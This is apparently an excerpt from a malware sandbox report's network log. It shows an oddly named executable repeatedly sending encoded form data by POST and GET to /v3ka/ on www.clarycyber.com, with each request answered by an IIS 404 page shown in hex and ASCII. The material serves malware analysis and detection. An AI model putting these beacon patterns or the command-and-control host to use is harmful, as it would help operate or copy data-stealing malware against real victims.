                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4a 30 68 62 2b 5a 41 58 65 6f 58 49 61 47 61 35 4b 4c 62 47 38 74 56 47 36 58 4c 45 73 75 49 6b 74 46 2f 6a 32 52 69 54 5a 6e 31 58 37 36 4b 68 76 46 4a 69 36 74 75 41 36 44 4e 56 78 58 58 31 34 78 71 48 74 39 57 51 42 58 51 64 4f 6a 56 64 77 42 78 30 6e 47 71 54 34 77 65 38 36 74 68 4a 6b 50 72 6a 72 54 65 32 34 35 51 6f 41 2f 6e 72 64 36 50 6d 4c 58 76 63 4d 45 36 51 49 75 2b 67 49 59 2b 73 45 61 30 77 77 35 74 50 2b 4b 2f 45 57 54 68 2f 46 4d 48 6a 57 39 44 5a 6a 6a 73 4e 77 42 62 56 6b 38 4e 4b 33 6f 7a 70 48 31 38 42 53 44 68 61 66 6f 77 52 7a 2b 31 4a 4c 51 4c 50 36 47 55 37 35 6e 61 43 78 2b 4d 3d
                                                                                    Data Ascii: c4qx7JIP=E6oTgpeoekQCJ0hb+ZAXeoXIaGa5KLbG8tVG6XLEsuIktF/j2RiTZn1X76KhvFJi6tuA6DNVxXX14xqHt9WQBXQdOjVdwBx0nGqT4we86thJkPrjrTe245QoA/nrd6PmLXvcME6QIu+gIY+sEa0ww5tP+K/EWTh/FMHjW9DZjjsNwBbVk8NK3ozpH18BSDhafowRz+1JLQLP6GU75naCx+M=
                                                                                    Mar 18, 2024 15:10:05.599039078 CET1286INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:04 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
                                                                                    Mar 18, 2024 15:10:05.599066019 CET1286INData Raw: 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
                                                                                    Mar 18, 2024 15:10:05.599085093 CET1286INData Raw: 33 33 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
                                                                                    Mar 18, 2024 15:10:05.599227905 CET1286INData Raw: 73 70 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
                                                                                    Mar 18, 2024 15:10:05.599247932 CET31INData Raw: 69 76 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                    Data Ascii: iv> </div> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.11.304983462.149.128.45806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:08.123799086 CET1667OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4a 30 68 62 2b 5a 41 58 65 6f 58 49 61 47 61 35 4b 4c 62 47 38 74 56 47 36 58 4c 45 73 76 77 6b 74 58 6e 6a 6e 41 69 54 59 6e 31 58 6e 71 4b 67 76 46 4a 46 36 74 48 49 36 43 77 75 78 55 2f 31 71 44 53 48 6f 50 79 51 4c 58 51 64 42 44 56 65 39 68 78 62 6e 47 36 58 34 30 36 38 36 74 68 4a 6b 4d 6a 6a 37 78 32 32 36 35 51 72 57 76 6e 6e 4b 71 50 65 4c 54 44 71 4d 45 32 6d 4a 64 6d 67 4c 34 75 73 47 49 73 77 39 35 74 4e 35 4b 2b 42 57 54 74 67 46 4b 6a 46 57 39 48 6a 6a 67 38 4e 7a 33 43 55 31 38 46 6a 6c 4a 6a 47 62 57 6f 61 54 52 41 4c 59 62 73 70 34 76 63 73 45 77 48 38 69 6d 51 57 74 6c 37 47 75 4a 53 77 53 53 56 76 55 6b 78 6b 79 55 59 4a 6b 35 49 79 72 41 57 52 4c 4a 49 52 47 4d 73 64 32 6d 52 4b 62 61 75 49 73 57 41 4e 4b 70 5a 67 6c 53 58 43 31 54 67 62 36 48 4d 79 76 39 6e 61 70 48 62 46 30 34 6c 4a 74 76 4d 39 4a 61 6d 32 61 5a 4e 70 50 67 62 6c 51 32 4b 66 48 6a 46 43 57 79 66 31 34 76 70 6c 5a 41 63 4e 57 39 30 7a 4f 48 52 43 48 69 6a 6c 52 42 70 48 43 67 67 2b 38 63 38 4a 79 72 75 47 4d 6f 6f 6a 6d 52 61 6c 55 6c 58 47 4b 63 35 54 69 56 56 6f 2b 6d 6f 47 53 6e 69 54 41 63 42 52 47 78 34 63 68 46 37 42 73 4e 6c 6d 4d 46 75 39 41 6c 44 64 41 42 32 64 69 4b 6b 6a 46 54 31 37 64 6f 45 2f 63 38 6d 6b 4b 65 55 78 66 42 6e 51 36 41 50 74 4f 74 69 35 4b 68 4e 65 4a 34 66 6a 5a 31 6c 48 54 64 41 78 36 38 2f 58 67 34 33 69 67 31 48 4c 45 45 51 71 67 4b 66 34 44 51 49 44 52 31 7a 4a 4e 71 30 67 53 78 63 6c 63 71 36 67 5a 77 68 36 37 44 30 6c 4b 2f 75 4f 56 54 46 6b 6f 31 4e 2b 54 4a 32 56 77 44 6e 67 36 2b 4c 32 6b 69 7a 4d 4a 54 71 48 72 77 43 57 71 50 51 63 6f 42 4a 33 2b 43 4f 43 56 43 74 45 4a 2b 39 73 6f 48 44 74 38 75 37 4d 6a 63 51 42 32 37 58 4c 55 42 61 49 48 33 5a 45 48 58 46 44 65 75 32 51 73 59 4f 42 74 58 58 72 7a 31 58 4a 7a 4e 73 55 42 32 72 6f 76 4c 36 51 6e 4b 36 4a 50 30 43 42 74 77 69 56 77 65 63 74 6b 57 67 73 36 63 43 5a 74 6a 69 36 63 57 4b 2f 4a 4c 41 57 50 78 64 31 75 47 6b 39 55 75 6f 65 58 56 76 64 48 59 58 36 48 4d 6f 6e 57 61 6e 74 30 62 43 58 55 75 6f 6c 58 56 70 35 78 74 59 32 79 4a 61 68 64 30 42 44 67 49 45 42 36 62 71 4b 47 57 4a 69 70 58 43 2f 57 32 34 32 54 63 67 65 37 6a 6b 38 51 59 78 51 79 66 35 46 4e 31 37 53 57 31 76 5a 2b 43 2f 77 7a 2f 44 65 63 69 75 74 68 6d 55 32 61 49 30 6a 59 4b 45 63 4f 68 56 4b 2b 49 48 77 44 46 70 54 46 37 55 65 63 61 46 47 54 5a 77 31 51 63 2f 64 48 66 52 58 35 58 30 42 6b 73 70 52 76 71 37 47 53 71 63 72 6d 61 36 67 38 67 71 73 53 65 32 73 38 6f 42 59 43 33 31 30 36 52 7a 42 52 53 33 42 33 43 62 49 74 32 4b 50 2b 2b 6c 32 62 59 63 6f 49 58 41 68 35 74 69 33 68 4d 5a 70 4e 43 62 6e 6b 50 38 52 69 77 39 78 4c 6b 55 35 72 36 48 69 67 65 66 50 41 6e 7a 75 73 45 6c 49 62 57 57 62 59 5a 79 2f 4c 6f 2f 79 6f 6b 42 78 4c 4e 6f 55 2b 46 6d 37 43 42 2b 50 31 65 75 42 56 79 4f 6a 50 73 37 78 6d 72 6e 6e 6f 55 48 6c 4e 6a 6e 71 38 46 4d 58 71 55 59 58 59 47 6d 6d 67 53 47 34 74 42 73 65 6f 57 7a 33 71 4c 78 4a 4e 30 57 47 4b 79 4d 42 58 39 47 59 7a 6f 78 74 53 39 4b 66 67 67 6d 52 2b 4e 77 7a 4c 59 31 37 72 5a 33 4a 78 44 4c 37 4a 4c 45 48 4d 57 62 73 50 68 50 55 45 68 36 75 62 41 6e 43 41 54 55 45 4e 46 45 7a 2f 41 63 69 61 4c 67 62 31 48 79 73 79 6c 36 69 79 57 69 4b 77 67 55 56 6f 47 67 77 68 57 58 6e 65 4e 70 47 46 44 32 76 51 7a 6e 44 42 79 4f 2f 4c 6e 51 78 34 69 38 6c 57 59 66 73 78 35 51 36 64 54 79 41 67 52 38 59 6f 39 4d 4c 73 6f 46 33
                                                                                    Data Ascii: c4qx7JIP=E6oTgpeoekQCJ0hb+ZAXeoXIaGa5KLbG8tVG6XLEsvwktXnjnAiTYn1XnqKgvFJF6tHI6CwuxU/1qDSHoPyQLXQdBDVe9hxbnG6X40686thJkMjj7x2265QrWvnnKqPeLTDqME2mJdmgL4usGIsw95tN5K+BWTtgFKjFW9Hjjg8Nz3CU18FjlJjGbWoaTRALYbsp4vcsEwH8imQWtl7GuJSwSSVvUkxkyUYJk5IyrAWRLJIRGMsd2mRKbauIsWANKpZglSXC1Tgb6HMyv9napHbF04lJtvM9Jam2aZNpPgblQ2KfHjFCWyf14vplZAcNW90zOHRCHijlRBpHCgg+8c8JyruGMoojmRalUlXGKc5TiVVo+moGSniTAcBRGx4chF7BsNlmMFu9AlDdAB2diKkjFT17doE/c8mkKeUxfBnQ6APtOti5KhNeJ4fjZ1lHTdAx68/Xg43ig1HLEEQqgKf4DQIDR1zJNq0gSxclcq6gZwh67D0lK/uOVTFko1N+TJ2VwDng6+L2kizMJTqHrwCWqPQcoBJ3+COCVCtEJ+9soHDt8u7MjcQB27XLUBaIH3ZEHXFDeu2QsYOBtXXrz1XJzNsUB2rovL6QnK6JP0CBtwiVwectkWgs6cCZtji6cWK/JLAWPxd1uGk9UuoeXVvdHYX6HMonWant0bCXUuolXVp5xtY2yJahd0BDgIEB6bqKGWJipXC/W242Tcge7jk8QYxQyf5FN17SW1vZ+C/wz/DeciuthmU2aI0jYKEcOhVK+IHwDFpTF7UecaFGTZw1Qc/dHfRX5X0BkspRvq7GSqcrma6g8gqsSe2s8oBYC3106RzBRS3B3CbIt2KP++l2bYcoIXAh5ti3hMZpNCbnkP8Riw9xLkU5r6HigefPAnzusElIbWWbYZy/Lo/yokBxLNoU+Fm7CB+P1euBVyOjPs7xmrnnoUHlNjnq8FMXqUYXYGmmgSG4tBseoWz3qLxJN0WGKyMBX9GYzoxtS9KfggmR+NwzLY17rZ3JxDL7JLEHMWbsPhPUEh6ubAnCATUENFEz/AciaLgb1Hysyl6iyWiKwgUVoGgwhWXneNpGFD2vQznDByO/LnQx4i8lWYfsx5Q6dTyAgR8Yo9MLsoF3
                                                                                    Mar 18, 2024 15:10:08.318068027 CET1286INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:07 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
                                                                                    Mar 18, 2024 15:10:08.318180084 CET1286INData Raw: 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
                                                                                    Mar 18, 2024 15:10:08.318315983 CET1286INData Raw: 33 33 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
                                                                                    Mar 18, 2024 15:10:08.318330050 CET1286INData Raw: 73 70 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
                                                                                    Mar 18, 2024 15:10:08.318340063 CET31INData Raw: 69 76 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                    Data Ascii: iv> </div> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.11.304983562.149.128.45806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:10.841500998 CET460OUTGET /v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:11.035219908 CET1286INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:09 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 5105
